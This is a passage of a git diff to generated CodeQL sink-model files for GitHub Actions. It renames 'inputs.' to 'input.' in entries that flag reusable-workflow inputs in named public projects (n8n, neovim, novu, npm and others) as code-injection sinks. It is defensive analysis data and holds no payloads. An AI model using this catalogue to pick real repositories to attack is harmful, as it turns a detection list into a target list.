"inputs.staging", "code-injection", "generated"] \ No newline at end of file + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index f7aafb13455..e43a220a278 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6107ae0e57c..dd20d310079 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 74e0182cc4f..3b9777b3f3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 4bbd06a86f5..3561bd15c36 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 59bdab8f39b..29da5a83b62 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6988e25d41c..9b92197cf5d 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3c025f59b78..cbed3964cff 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 5de0d170d40..29b47c04336 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 19d38d1241d..3c406b3bc0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index b1c787677a6..3a94887f8ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 249c734f55b..5198d5f418a 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "input.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 46951b5436d..e3694a38973 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] - - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index cd1d0f318ef..f6f33154581 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 4055874a790..34efc8414d8 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index bccd7271b08..71866026ef9 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 56528159143..83d241d21c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index c4a9b07ed99..3021de12568 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index db4f26083a0..d2cb1da1e9f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c12a079e2e2..c551a135a14 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 3b7122a7a13..f469f5de268 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 3e80edaaaff..7ec8dac3f7b 100644 